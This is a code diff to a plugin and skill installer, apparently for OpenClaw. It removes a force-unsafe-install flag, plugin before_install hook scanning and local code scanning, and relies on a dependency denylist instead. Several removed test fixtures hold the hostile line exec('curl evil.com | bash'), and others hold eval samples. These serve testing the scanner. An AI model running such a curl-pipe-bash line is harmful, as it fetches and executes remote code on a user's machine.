     .argument("[id]", "Plugin or hook-pack id (omit with --all)")
     .option("--all", "Update all tracked plugins and hook packs", false)
     .option("--dry-run", "Show what would change without writing", false)
-    .option(
-      "--dangerously-force-unsafe-install",
-      "Bypass built-in dangerous-code update blocking for plugins (plugin hooks may still block)",
-      false,
-    )
     .action(async (id: string | undefined, opts: PluginUpdateOptions) => {
       const { runPluginUpdateCommand } = await import("./plugins-update-command.js");
       await runPluginUpdateCommand({ id, opts });

--- a/src/cli/plugins-cli.update.test.ts
+++ b/src/cli/plugins-cli.update.test.ts
@@ -196,7 +196,12 @@ describe("plugins cli update", () => {
       outcomes: [],
     });
 
-    await runPluginsCommand(["plugins", "update", "openclaw-codex-app-server"]);
+    await runPluginsCommand([
+      "plugins",
+      "update",
+      "openclaw-codex-app-server",
+      "--dangerously-force-unsafe-install",
+    ]);
 
     const updateParams = expectSingleCallParams(updateNpmInstalledPlugins);
     expect(updateParams.config).toEqual(config);

--- a/src/cli/plugins-cli.update.test.ts
+++ b/src/cli/plugins-cli.update.test.ts
@@ -67,7 +67,7 @@ describe("plugins cli update", () => {
     }
   });
 
-  it("shows the dangerous unsafe install override in update help", () => {
+  it("does not expose the removed dangerous unsafe install override in update help", () => {
     const program = new Command();
     registerPluginsCli(program);
 
@@ -75,9 +75,8 @@ describe("plugins cli update", () => {
     const updateCommand = pluginsCommand?.commands.find((command) => command.name() === "update");
     const helpText = updateCommand?.helpInformation() ?? "";
 
-    expect(helpText).toContain("--dangerously-force-unsafe-install");
-    expect(helpText).toContain("Bypass built-in dangerous-code update");
-    expect(helpText).toContain("blocking for plugins");
+    expect(helpText).not.toContain("--dangerously-force-unsafe-install");
+    expect(helpText).not.toContain("Bypass built-in dangerous-code update");
   });
 
   it("refuses plugin updates in Nix mode before package-manager work", async () => {
@@ -184,7 +183,7 @@ describe("plugins cli update", () => {
     expect(runtimeLogs.at(-1)).toBe("No tracked plugins or hook packs to update.");
   });
 
-  it("passes dangerous force unsafe install to plugin updates", async () => {
+  it("does not pass removed dangerous force unsafe install to plugin updates", async () => {
     const config = createTrackedPluginConfig({
       pluginId: "openclaw-codex-app-server",
       spec: "openclaw-codex-app-server@beta",
@@ -197,17 +196,12 @@ describe("plugins cli update", () => {
       outcomes: [],
     });
 
-    await runPluginsCommand([
-      "plugins",
-      "update",
-      "openclaw-codex-app-server",
-      "--dangerously-force-unsafe-install",
-    ]);
+    await runPluginsCommand(["plugins", "update", "openclaw-codex-app-server"]);
 
     const updateParams = expectSingleCallParams(updateNpmInstalledPlugins);
     expect(updateParams.config).toEqual(config);
     expect(updateParams.pluginIds).toEqual(["openclaw-codex-app-server"]);
-    expect(updateParams.dangerouslyForceUnsafeInstall).toBe(true);
+    expect(updateParams).not.toHaveProperty("dangerouslyForceUnsafeInstall");
   });
 
   it("writes updated config when updater reports changes", async () => {

--- a/src/cli/plugins-install-command.ts
+++ b/src/cli/plugins-install-command.ts
@@ -14,7 +14,6 @@ import { buildClawHubPluginInstallRecordFields } from "../plugins/clawhub-instal
 import { installPluginFromClawHub } from "../plugins/clawhub.js";
 import { installPluginFromGitSpec, parseGitPluginSpec } from "../plugins/git-install.js";
 import { resolveDefaultPluginExtensionsDir } from "../plugins/install-paths.js";
-import type { InstallSafetyOverrides } from "../plugins/install-security-scan.js";
 import {
   PLUGIN_INSTALL_ERROR_CODE,
   installPluginFromNpmPackArchive,
@@ -59,14 +58,12 @@ import {
 import { persistHookPackInstall, persistPluginInstall } from "./plugins-install-persist.js";
 import type { ConfigSnapshotForInstallPersist } from "./plugins-install-persist.js";
 
+type PluginInstallTrustOverrides = {
+  trustedSourceLinkedOfficialInstall?: boolean;
+};
+
 function resolveInstallMode(force?: boolean): "install" | "update" {
   return force ? "update" : "install";
-}
-
-function resolveInstallSafetyOverrides(overrides: InstallSafetyOverrides): InstallSafetyOverrides {
-  return {
-    dangerouslyForceUnsafeInstall: overrides.dangerouslyForceUnsafeInstall,
-  };
 }
 
 function findTrustedCatalogPackageInstall(packageName: string):
@@ -179,7 +176,6 @@ async function tryInstallHookPackFromLocalPath(params: {
   snapshot: ConfigSnapshotForInstallPersist;
   resolvedPath: string;
   installMode: "install" | "update";
-  safetyOverrides?: InstallSafetyOverrides;
   link?: boolean;
   runtime?: RuntimeEnv;
 }): Promise<{ ok: true } | { ok: false; error: string }> {
@@ -193,7 +189,6 @@ async function tryInstallHookPackFromLocalPath(params: {
     }
 
     const probe = await installHooksFromPath({
-      ...resolveInstallSafetyOverrides(params.safetyOverrides ?? {}),
       path: params.resolvedPath,
       dryRun: true,
     });
@@ -236,7 +231,6 @@ async function tryInstallHookPackFromLocalPath(params: {
   }
 
   const result = await installHooksFromPath({
-    ...resolveInstallSafetyOverrides(params.safetyOverrides ?? {}),
     path: params.resolvedPath,
     mode: params.installMode,
     logger: createHookPackInstallLogger(params.runtime),
@@ -303,7 +297,7 @@ async function tryInstallPluginOrHookPackFromNpmSpec(params: {
   installMode: "install" | "update";
   spec: string;
   pin?: boolean;
-  safetyOverrides: InstallSafetyOverrides;
+  safetyOverrides: PluginInstallTrustOverrides;
   allowBundledFallback: boolean;
   extensionsDir: string;
   expectedPluginId?: string;
@@ -384,7 +378,7 @@ async function tryInstallPluginFromNpmPackArchive(params: {
   snapshot: ConfigSnapshotForInstallPersist;
   installMode: "install" | "update";
   archivePath: string;
-  safetyOverrides: InstallSafetyOverrides;
+  safetyOverrides: PluginInstallTrustOverrides;
   extensionsDir: string;
   runtime?: RuntimeEnv;
 }): Promise<{ ok: true } | { ok: false }> {
@@ -432,7 +426,7 @@ async function tryInstallPluginFromGitSpec(params: {
   snapshot: ConfigSnapshotForInstallPersist;
   installMode: "install" | "update";
   spec: string;
-  safetyOverrides: InstallSafetyOverrides;
+  safetyOverrides: PluginInstallTrustOverrides;
   extensionsDir: string;
   runtime?: RuntimeEnv;
 }): Promise<{ ok: true } | { ok: false }> {
@@ -561,7 +555,7 @@ export async function loadConfigForInstall(
 
 export async function runPluginInstallCommand(params: {
   raw: string;
-  opts: InstallSafetyOverrides & {
+  opts: PluginInstallTrustOverrides & {
     force?: boolean;
     link?: boolean;
     pin?: boolean;
@@ -648,12 +642,11 @@ export async function runPluginInstallCommand(params: {
   }
   const cfg = snapshot.config;
   const installMode = resolveInstallMode(opts.force);
-  const safetyOverrides = resolveInstallSafetyOverrides(opts);
   const extensionsDir = resolveDefaultPluginExtensionsDir();
+  const safetyOverrides: PluginInstallTrustOverrides = {};
 
   if (opts.marketplace) {
     const result = await installPluginFromMarketplace({
-      ...safetyOverrides,
       marketplace: opts.marketplace,
       mode: installMode,
       plugin: raw,

--- a/src/cli/plugins-install-command.ts
+++ b/src/cli/plugins-install-command.ts
@@ -697,7 +697,6 @@ export async function runPluginInstallCommand(params: {
           snapshot,
           installMode,
           resolvedPath: resolved,
-          safetyOverrides,
           link: true,
           runtime,
         });
@@ -751,7 +750,6 @@ export async function runPluginInstallCommand(params: {
         snapshot,
         installMode,
         resolvedPath: resolved,
-        safetyOverrides,
         runtime,
       });
       if (hookFallback.ok) {

--- a/src/cli/plugins-update-command.ts
+++ b/src/cli/plugins-update-command.ts
@@ -24,7 +24,7 @@ import { promptYesNo } from "./prompt.js";
 
 export async function runPluginUpdateCommand(params: {
   id?: string;
-  opts: { all?: boolean; dryRun?: boolean; dangerouslyForceUnsafeInstall?: boolean };
+  opts: { all?: boolean; dryRun?: boolean };
 }) {
   assertConfigWriteAllowedInCurrentMode();
 
@@ -61,7 +61,6 @@ export async function runPluginUpdateCommand(params: {
     pluginIds: pluginSelection.pluginIds,
     specOverrides: pluginSelection.specOverrides,
     dryRun: params.opts.dryRun,
-    dangerouslyForceUnsafeInstall: params.opts.dangerouslyForceUnsafeInstall,
     logger,
     onIntegrityDrift: async (drift) => {
       const specLabel = drift.resolvedSpec ?? drift.spec;

--- a/src/gateway/server-methods/skills-upload.test.ts
+++ b/src/gateway/server-methods/skills-upload.test.ts
@@ -461,34 +461,24 @@ describe("skill upload gateway handlers", () => {
     await expectPathMissing(path.join(workspaceDir, "skills", "traversal-skill"));
   });
 
-  it("treats security scan blocks as terminal invalid uploads", async () => {
+  it("does not run local code scanning for uploaded skill archives", async () => {
     const { handlers, stateDir } = await makeHarness();
-    installSecurityScanState.scanSkillInstallSource.mockResolvedValueOnce({
-      blocked: {
-        code: "security_scan_blocked",
-        reason:
-          'Skill "scan-blocked" installation blocked: blocked dependencies "plain-crypto-js" declared in package.json.',
-      },
-    });
+    installSecurityScanState.scanSkillInstallSource.mockRejectedValueOnce(
+      new Error("scanner should not run"),
+    );
     const upload = await uploadArchive(handlers, {
       archive: await makeSkillArchive({}),
-      slug: "scan-blocked",
+      slug: "operator-trusted",
     });
 
     const install = await call(handlers, "skills.install", {
       source: "upload",
       uploadId: upload.uploadId,
-      slug: "scan-blocked",
+      slug: "operator-trusted",
     });
 
-    expect(install.ok).toBe(false);
-    expect(install.error?.code).toBe("INVALID_REQUEST");
-    expect(install.error?.message).toContain("blocked dependencies");
-    const scanInput = firstCallArg<{ origin?: string; skillName?: string }>(
-      installSecurityScanState.scanSkillInstallSource,
-    );
-    expect(scanInput.origin).toBe("skill-upload");
-    expect(scanInput.skillName).toBe("scan-blocked");
+    expect(install.ok).toBe(true);
+    expect(installSecurityScanState.scanSkillInstallSource).not.toHaveBeenCalled();
     await expectPathMissing(path.join(stateDir, "tmp", "skill-uploads", upload.uploadId));
   });
 

--- a/src/gateway/server-methods/skills-upload.test.ts
+++ b/src/gateway/server-methods/skills-upload.test.ts
@@ -140,14 +140,6 @@ function expectError(result: CallResult, code: string, message: string): void {
   expect(result.error?.message).toBe(message);
 }
 
-function firstCallArg<T>(mock: { mock: { calls: unknown[][] } }, _type?: (value: T) => T): T {
-  const callLocal = mock.mock.calls.at(0);
-  if (!callLocal) {
-    throw new Error("Expected first mock call");
-  }
-  return callLocal[0] as T;
-}
-
 async function makeSkillArchive(params: {
   name?: string;
   description?: string;

--- a/src/gateway/server-methods/skills.clawhub.test.ts
+++ b/src/gateway/server-methods/skills.clawhub.test.ts
@@ -259,7 +259,7 @@ describe("skills gateway handlers (clawhub)", () => {
     expect(result?.version).toBe("1.2.3");
   });
 
-  it("forwards dangerous override for local skill installs", async () => {
+  it("ignores legacy dangerous override for local skill installs", async () => {
     installSkillMock.mockResolvedValue({
       ok: true,
       message: "Installed",
@@ -279,7 +279,6 @@ describe("skills gateway handlers (clawhub)", () => {
       workspaceDir: "/tmp/workspace",
       skillName: "calendar",
       installId: "deps",
-      dangerouslyForceUnsafeInstall: true,
       timeoutMs: 120_000,
       config: {},
     });

--- a/src/gateway/server-methods/skills.ts
+++ b/src/gateway/server-methods/skills.ts
@@ -492,14 +492,12 @@ export const skillsHandlers: GatewayRequestHandlers = {
     const p = params as {
       name: string;
       installId: string;
-      dangerouslyForceUnsafeInstall?: boolean;
       timeoutMs?: number;
     };
     const result = await installSkill({
       workspaceDir: workspaceDirRaw,
       skillName: p.name,
       installId: p.installId,
-      dangerouslyForceUnsafeInstall: p.dangerouslyForceUnsafeInstall,
       timeoutMs: p.timeoutMs,
       config: cfg,
     });

--- a/src/plugins/install-security-scan.runtime.ts
+++ b/src/plugins/install-security-scan.runtime.ts
@@ -17,8 +17,6 @@ import {
   findBlockedNodeModulesDirectory,
   findBlockedNodeModulesFileAlias,
 } from "./dependency-denylist.js";
-import { getGlobalHookRunner } from "./hook-runner-global.js";
-import { createBeforeInstallHookPayload } from "./install-policy-context.js";
 import type { InstallSafetyOverrides } from "./install-security-scan.types.js";
 import { listBuiltRuntimeEntryCandidates } from "./package-entrypoints.js";
 
@@ -1031,74 +1029,6 @@ async function scanFileTarget(params: {
   });
 }
 
-async function runBeforeInstallHook(params: {
-  logger: InstallScanLogger;
-  installLabel: string;
-  origin: string;
-  sourcePath: string;
-  sourcePathKind: "file" | "directory";
-  targetName: string;
-  targetType: "skill" | "plugin";
-  requestKind: PluginInstallRequestKind;
-  requestMode: "install" | "update";
-  requestedSpecifier?: string;
-  builtinScan: BuiltinInstallScan;
-  skill?: {
-    installId: string;
-    installSpec?: SkillInstallSpec;
-  };
-  plugin?: {
-    contentType: "bundle" | "package" | "file";
-    pluginId: string;
-    packageName?: string;
-    manifestId?: string;
-    version?: string;
-    extensions?: string[];
-  };
-}): Promise<InstallSecurityScanResult | undefined> {
-  const hookRunner = getGlobalHookRunner();
-  if (!hookRunner?.hasHooks("before_install")) {
-    return undefined;
-  }
-
-  try {
-    const { event, ctx } = createBeforeInstallHookPayload({
-      targetName: params.targetName,
-      targetType: params.targetType,
-      origin: params.origin,
-      sourcePath: params.sourcePath,
-      sourcePathKind: params.sourcePathKind,
-      request: {
-        kind: params.requestKind,
-        mode: params.requestMode,
-        ...(params.requestedSpecifier ? { requestedSpecifier: params.requestedSpecifier } : {}),
-      },
-      builtinScan: params.builtinScan,
-      ...(params.skill ? { skill: params.skill } : {}),
-      ...(params.plugin ? { plugin: params.plugin } : {}),
-    });
-    const hookResult = await hookRunner.runBeforeInstall(event, ctx);
-    if (hookResult?.block) {
-      const reason = hookResult.blockReason || "Installation blocked by plugin hook";
-      params.logger.warn?.(`WARNING: ${params.installLabel} blocked by plugin hook: ${reason}`);
-      return { blocked: { reason } };
-    }
-    if (hookResult?.findings) {
-      for (const finding of hookResult.findings) {
-        if (finding.severity === "critical" || finding.severity === "warn") {
-          params.logger.warn?.(
-            `Plugin scanner: ${finding.message} (${finding.file}:${finding.line})`,
-          );
-        }
-      }
-    }
-  } catch {
-    // Hook errors are non-fatal.
-  }
-
-  return undefined;
-}
-
 export async function scanBundleInstallSourceRuntime(
   params: InstallSafetyOverrides & {
     logger: InstallScanLogger;
@@ -1133,26 +1063,19 @@ export async function scanBundleInstallSourceRuntime(
     targetLabel: `Bundle "${params.pluginId}" installation`,
   });
 
-  const hookResult = await runBeforeInstallHook({
+  return builtinBlocked;
+}
+
+export async function validateBundleInstallDependenciesRuntime(params: {
+  logger: InstallScanLogger;
+  pluginId: string;
+  sourceDir: string;
+}): Promise<InstallSecurityScanResult | undefined> {
+  return await scanManifestDependencyDenylist({
     logger: params.logger,
-    installLabel: `Bundle "${params.pluginId}" installation`,
-    origin: "plugin-bundle",
-    sourcePath: params.sourceDir,
-    sourcePathKind: "directory",
-    targetName: params.pluginId,
-    targetType: "plugin",
-    requestKind: params.requestKind ?? "plugin-dir",
-    requestMode: params.mode ?? "install",
-    requestedSpecifier: params.requestedSpecifier,
-    builtinScan,
-    plugin: {
-      contentType: "bundle",
-      pluginId: params.pluginId,
-      manifestId: params.pluginId,
-      ...(params.version ? { version: params.version } : {}),
-    },
+    packageDir: params.sourceDir,
+    targetLabel: `Bundle "${params.pluginId}" installation`,
   });
-  return hookResult?.blocked ? hookResult : builtinBlocked;
 }
 
 export async function scanPackageInstallSourceRuntime(
@@ -1223,28 +1146,19 @@ export async function scanPackageInstallSourceRuntime(
     targetLabel: `Plugin "${params.pluginId}" installation`,
   });
 
-  const hookResult = await runBeforeInstallHook({
+  return builtinBlocked;
+}
+
+export async function validatePackageInstallDependenciesRuntime(params: {
+  logger: InstallScanLogger;
+  packageDir: string;
+  pluginId: string;
+}): Promise<InstallSecurityScanResult | undefined> {
+  return await scanManifestDependencyDenylist({
     logger: params.logger,
-    installLabel: `Plugin "${params.pluginId}" installation`,
-    origin: "plugin-package",
-    sourcePath: params.packageDir,
-    sourcePathKind: "directory",
-    targetName: params.pluginId,
-    targetType: "plugin",
-    requestKind: params.requestKind ?? "plugin-dir",
-    requestMode: params.mode ?? "install",
-    requestedSpecifier: params.requestedSpecifier,
-    builtinScan,
-    plugin: {
-      contentType: "package",
-      pluginId: params.pluginId,
-      ...(params.packageName ? { packageName: params.packageName } : {}),
-      ...(params.manifestId ? { manifestId: params.manifestId } : {}),
-      ...(params.version ? { version: params.version } : {}),
-      extensions: params.extensions.slice(),
-    },
+    packageDir: params.packageDir,
+    targetLabel: `Plugin "${params.pluginId}" installation`,
   });
-  return hookResult?.blocked ? hookResult : builtinBlocked;
 }
 
 export async function scanInstalledPackageDependencyTreeRuntime(params: {
@@ -1281,6 +1195,17 @@ export async function scanInstalledPackageDependencyTreeRuntime(params: {
   return undefined;
 }
 
+export async function validateInstalledPackageDependencyTreeRuntime(params: {
+  additionalPackageDirs?: string[];
+  allowManagedNpmRootPackagePeerSymlinks?: boolean;
+  dependencyScanRootDir?: string;
+  logger: InstallScanLogger;
+  packageDir: string;
+  pluginId: string;
+}): Promise<InstallSecurityScanResult | undefined> {
+  return await scanInstalledPackageDependencyTreeRuntime(params);
+}
+
 export async function scanFileInstallSourceRuntime(
   params: InstallSafetyOverrides & {
     filePath: string;
@@ -1304,25 +1229,7 @@ export async function scanFileInstallSourceRuntime(
     targetLabel: `Plugin file "${params.pluginId}" installation`,
   });
 
-  const hookResult = await runBeforeInstallHook({
-    logger: params.logger,
-    installLabel: `Plugin file "${params.pluginId}" installation`,
-    origin: "plugin-file",
-    sourcePath: params.filePath,
-    sourcePathKind: "file",
-    targetName: params.pluginId,
-    targetType: "plugin",
-    requestKind: "plugin-file",
-    requestMode: params.mode ?? "install",
-    requestedSpecifier: params.requestedSpecifier,
-    builtinScan,
-    plugin: {
-      contentType: "file",
-      pluginId: params.pluginId,
-      extensions: [path.basename(params.filePath)],
-    },
-  });
-  return hookResult?.blocked ? hookResult : builtinBlocked;
+  return builtinBlocked;
 }
 
 export async function scanSkillInstallSourceRuntime(params: {
@@ -1356,21 +1263,5 @@ export async function scanSkillInstallSourceRuntime(params: {
     });
   }
 
-  const hookResult = await runBeforeInstallHook({
-    logger: params.logger,
-    installLabel: `Skill "${params.skillName}" installation`,
-    origin: params.origin,
-    sourcePath: params.sourceDir,
-    sourcePathKind: "directory",
-    targetName: params.skillName,
-    targetType: "skill",
-    requestKind: "skill-install",
-    requestMode: "install",
-    builtinScan,
-    skill: {
-      installId: params.installId,
-      ...(params.installSpec ? { installSpec: params.installSpec } : {}),
-    },
-  });
-  return hookResult?.blocked ? hookResult : builtinBlocked;
+  return builtinBlocked;
 }

--- a/src/plugins/install-security-scan.ts
+++ b/src/plugins/install-security-scan.ts
@@ -93,6 +93,36 @@ export async function scanInstalledPackageDependencyTree(params: {
   return await scanInstalledPackageDependencyTreeRuntime(params);
 }
 
+export async function validateBundleInstallDependencies(params: {
+  logger: InstallScanLogger;
+  pluginId: string;
+  sourceDir: string;
+}): Promise<InstallSecurityScanResult | undefined> {
+  const { validateBundleInstallDependenciesRuntime } = await loadInstallSecurityScanRuntime();
+  return await validateBundleInstallDependenciesRuntime(params);
+}
+
+export async function validatePackageInstallDependencies(params: {
+  logger: InstallScanLogger;
+  packageDir: string;
+  pluginId: string;
+}): Promise<InstallSecurityScanResult | undefined> {
+  const { validatePackageInstallDependenciesRuntime } = await loadInstallSecurityScanRuntime();
+  return await validatePackageInstallDependenciesRuntime(params);
+}
+
+export async function validateInstalledPackageDependencyTree(params: {
+  additionalPackageDirs?: string[];
+  allowManagedNpmRootPackagePeerSymlinks?: boolean;
+  dependencyScanRootDir?: string;
+  logger: InstallScanLogger;
+  packageDir: string;
+  pluginId: string;
+}): Promise<InstallSecurityScanResult | undefined> {
+  const { validateInstalledPackageDependencyTreeRuntime } = await loadInstallSecurityScanRuntime();
+  return await validateInstalledPackageDependencyTreeRuntime(params);
+}
+
 export async function scanFileInstallSource(
   params: InstallSafetyOverrides & {
     filePath: string;

--- a/src/plugins/install.npm-spec.e2e.test.ts
+++ b/src/plugins/install.npm-spec.e2e.test.ts
@@ -816,7 +816,7 @@ describe("installPluginFromNpmSpec e2e", () => {
     ).resolves.toBeTruthy();
   });
 
-  it("rolls back managed peer dependencies added before a failed install scan", async () => {
+  it("rolls back managed peer dependencies added before failed dependency validation", async () => {
     const rootDir = await makeTempDir("npm-plugin-peer-rollback-e2e");
     const npmRoot = path.join(rootDir, "managed-npm");
     const blockedPlugin = `blocked-plugin-${crypto.randomUUID().replace(/-/g, "").slice(0, 12)}`;
@@ -827,11 +827,23 @@ describe("installPluginFromNpmSpec e2e", () => {
         latest: "1.0.0",
         versions: [
           await packPlugin({
-            indexJs: "eval('1');\n",
+            dependencies: { "plain-crypto-js": "1.0.0" },
             packageName: blockedPlugin,
             peerDependencies: { [runtimePeer]: "^1.0.0" },
             peerDependenciesMeta: {},
             pluginId: blockedPlugin,
+            version: "1.0.0",
+            rootDir,
+          }),
+        ],
+      },
+      {
+        packageName: "plain-crypto-js",
+        latest: "1.0.0",
+        versions: [
+          await packPlugin({
+            packageName: "plain-crypto-js",
+            pluginId: "plain-crypto-js",
             version: "1.0.0",
             rootDir,
           }),
@@ -954,7 +966,7 @@ describe("installPluginFromNpmSpec e2e", () => {
         latest: "1.0.0",
         versions: [
           await packPlugin({
-            indexJs: "eval('1');\n",
+            dependencies: { "plain-crypto-js": "1.0.0" },
             packageName: blockedPlugin,
             peerDependencies: {
               [existingRootDependency]: "^1.0.0",
@@ -962,6 +974,18 @@ describe("installPluginFromNpmSpec e2e", () => {
             },
             peerDependenciesMeta: {},
             pluginId: blockedPlugin,
+            version: "1.0.0",
+            rootDir,
+          }),
+        ],
+      },
+      {
+        packageName: "plain-crypto-js",
+        latest: "1.0.0",
+        versions: [
+          await packPlugin({
+            packageName: "plain-crypto-js",
+            pluginId: "plain-crypto-js",
             version: "1.0.0",
             rootDir,
           }),

--- a/src/plugins/install.npm-spec.test.ts
+++ b/src/plugins/install.npm-spec.test.ts
@@ -761,7 +761,7 @@ describe("installPluginFromNpmSpec", () => {
         integrity: "sha512-pack-demo-v2",
         shasum: "packdemoshav2",
         packArchivePath: archiveV2Path,
-        indexJs: `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+        dependency: { name: "plain-crypto-js", version: "1.0.0" },
       },
     ]);
 
@@ -796,7 +796,7 @@ describe("installPluginFromNpmSpec", () => {
         integrity: "sha512-pack-demo-v2",
         shasum: "packdemoshav2",
         packArchivePath: archivePath,
-        indexJs: `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+        dependency: { name: "plain-crypto-js", version: "1.0.0" },
       },
     ]);
 
@@ -1860,7 +1860,7 @@ describe("installPluginFromNpmSpec", () => {
     ).toBe(false);
   });
 
-  it("allows npm-spec installs with dangerous code patterns when forced unsafe install is set", async () => {
+  it("allows npm-spec installs with dangerous code patterns without scanner warnings", async () => {
     const npmRoot = path.join(suiteTempRootTracker.makeTempDir(), "npm");
     const warnings: string[] = [];
     mockNpmViewAndInstall({
@@ -1874,7 +1874,6 @@ describe("installPluginFromNpmSpec", () => {
 
     const result = await installPluginFromNpmSpec({
       spec: "dangerous-plugin@1.0.0",
-      dangerouslyForceUnsafeInstall: true,
       npmDir: npmRoot,
       logger: {
         info: () => {},
@@ -1883,13 +1882,7 @@ describe("installPluginFromNpmSpec", () => {
     });
 
     expect(result.ok).toBe(true);
-    expect(
-      warnings.some((warning) =>
-        warning.includes(
-          "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-        ),
-      ),
-    ).toBe(true);
+    expect(warnings.some((warning) => warning.includes("dangerous code patterns"))).toBe(false);
     expectNpmInstallIntoProject({
       calls: runCommandWithTimeoutMock.mock.calls,
       npmRoot,
@@ -2212,7 +2205,7 @@ describe("installPluginFromNpmSpec", () => {
     );
   });
 
-  it("rolls back installed npm package debris when security scan blocks the plugin", async () => {
+  it("rolls back installed npm package debris when dependency denylist blocks the plugin", async () => {
     const npmRoot = path.join(suiteTempRootTracker.makeTempDir(), "npm");
     mockNpmViewAndInstall({
       spec: "dangerous-plugin@1.0.0",
@@ -2220,7 +2213,7 @@ describe("installPluginFromNpmSpec", () => {
       version: "1.0.0",
       pluginId: "dangerous-plugin",
       npmRoot,
-      indexJs: `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+      dependency: { name: "plain-crypto-js", version: "1.0.0" },
     });
 
     const result = await installPluginFromNpmSpec({
@@ -2240,7 +2233,7 @@ describe("installPluginFromNpmSpec", () => {
     ).rejects.toHaveProperty("code", "ENOENT");
   });
 
-  it("leaves a stale legacy shared npm root untouched when a per-plugin update is blocked", async () => {
+  it("leaves a stale legacy shared npm root untouched when dependency validation blocks a per-plugin update", async () => {
     const stateDir = suiteTempRootTracker.makeTempDir();
     const npmRoot = path.join(stateDir, "npm");
     const legacyNodeModulesRoot = path.join(npmRoot, "node_modules");
@@ -2340,7 +2333,7 @@ describe("installPluginFromNpmSpec", () => {
       pluginId: "dangerous-plugin",
       npmRoot,
       expectedDependencySpec: "2.0.0",
-      indexJs: `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+      dependency: { name: "plain-crypto-js", version: "1.0.0" },
     });
 
     const result = await installPluginFromNpmSpec({
@@ -2393,7 +2386,7 @@ describe("installPluginFromNpmSpec", () => {
   ];
 
   it.each(officialLaunchPluginCases)(
-    "blocks direct official npm plugin $spec with launch code without source provenance",
+    "allows direct official npm plugin $spec with launch code without scanner warnings",
     async ({ spec, pluginId, indexJs }) => {
       const npmRoot = path.join(suiteTempRootTracker.makeTempDir(), "npm");
       const warnings: string[] = [];
@@ -2415,17 +2408,12 @@ describe("installPluginFromNpmSpec", () => {
         },
       });
 
-      expect(result.ok).toBe(false);
-      if (result.ok) {
+      expect(result.ok).toBe(true);
+      if (!result.ok) {
         return;
       }
-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
-      expect(fs.existsSync(resolveTestPluginPackageDir(npmRoot, spec))).toBe(false);
-      expect(
-        warnings.some((warning) =>
-          warning.includes("allowed because it is an official OpenClaw package"),
-        ),
-      ).toBe(false);
+      expect(fs.existsSync(resolveTestPluginPackageDir(npmRoot, spec))).toBe(true);
+      expect(warnings.some((warning) => warning.includes("dangerous code patterns"))).toBe(false);
     },
   );
 

--- a/src/plugins/install.path.test.ts
+++ b/src/plugins/install.path.test.ts
@@ -3,11 +3,7 @@ import path from "node:path";
 import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
 import { runCommandWithTimeout } from "../process/exec.js";
 import { resetGlobalHookRunner } from "./hook-runner-global.js";
-import {
-  installPluginFromFile,
-  installPluginFromPath,
-  PLUGIN_INSTALL_ERROR_CODE,
-} from "./install.js";
+import { installPluginFromFile, installPluginFromPath } from "./install.js";
 import { packToArchive } from "./test-helpers/archive-fixtures.js";
 import { createSuiteTempRootTracker } from "./test-helpers/fs-fixtures.js";
 

--- a/src/plugins/install.path.test.ts
+++ b/src/plugins/install.path.test.ts
@@ -2,8 +2,7 @@ import fs from "node:fs";
 import path from "node:path";
 import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
 import { runCommandWithTimeout } from "../process/exec.js";
-import { initializeGlobalHookRunner, resetGlobalHookRunner } from "./hook-runner-global.js";
-import { createMockPluginRegistry } from "./hooks.test-helpers.js";
+import { resetGlobalHookRunner } from "./hook-runner-global.js";
 import {
   installPluginFromFile,
   installPluginFromPath,
@@ -135,14 +134,9 @@ function setupNativePluginInstallFixture() {
   return { caseDir, pluginDir, extensionsDir: path.join(stateDir, "extensions") };
 }
 
-async function installFromFileWithWarnings(params: {
-  extensionsDir: string;
-  filePath: string;
-  dangerouslyForceUnsafeInstall?: boolean;
-}) {
+async function installFromFileWithWarnings(params: { extensionsDir: string; filePath: string }) {
   const warnings: string[] = [];
   const result = await installPluginFromFile({
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     filePath: params.filePath,
     extensionsDir: params.extensionsDir,
     logger: {
@@ -198,113 +192,21 @@ beforeEach(() => {
 });
 
 describe("installPluginFromPath", () => {
-  it("runs before_install for plain file plugins with file provenance metadata", async () => {
-    const handler = vi.fn().mockReturnValue({
-      findings: [
-        {
-          ruleId: "manual-review",
-          severity: "warn",
-          file: "payload.js",
-          line: 1,
-          message: "Review single-file plugin before install",
-        },
-      ],
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    const baseDir = suiteTempRootTracker.makeTempDir();
-    const extensionsDir = path.join(baseDir, "extensions");
-    fs.mkdirSync(extensionsDir, { recursive: true });
-
-    const sourcePath = path.join(baseDir, "payload.js");
-    fs.writeFileSync(sourcePath, "console.log('SAFE');\n", "utf-8");
-
-    const result = await installPluginFromFile({
-      filePath: sourcePath,
-      extensionsDir,
-    });
-
-    expect(result.ok).toBe(true);
-    expect(handler).toHaveBeenCalledTimes(1);
-    const [installContext, installMetadata] = handler.mock.calls[0] ?? [];
-    expect(installContext).toEqual({
-      targetName: "payload",
-      targetType: "plugin",
-      origin: "plugin-file",
-      sourcePath,
-      sourcePathKind: "file",
-      request: {
-        kind: "plugin-file",
-        mode: "install",
-        requestedSpecifier: sourcePath,
-      },
-      builtinScan: {
-        status: "ok",
-        scannedFiles: 1,
-        critical: 0,
-        warn: 0,
-        info: 0,
-        findings: [],
-      },
-      plugin: {
-        contentType: "file",
-        pluginId: "payload",
-        extensions: ["payload.js"],
-      },
-    });
-    expect(installMetadata).toEqual({
-      origin: "plugin-file",
-      targetType: "plugin",
-      requestKind: "plugin-file",
-    });
-  });
-
-  it("blocks plain file installs when the scanner finds dangerous code patterns", async () => {
+  it("does not run local code scanning for plain file plugins", async () => {
     const baseDir = suiteTempRootTracker.makeTempDir();
     const extensionsDir = path.join(baseDir, "extensions");
     fs.mkdirSync(extensionsDir, { recursive: true });
 
     const sourcePath = path.join(baseDir, "payload.js");
     fs.writeFileSync(sourcePath, "eval('danger');\n", "utf-8");
-    const expectedFinding = `Dynamic code execution detected (${sourcePath}:1)`;
 
     const { result, warnings } = await installFromFileWithWarnings({
       filePath: sourcePath,
       extensionsDir,
-    });
-
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
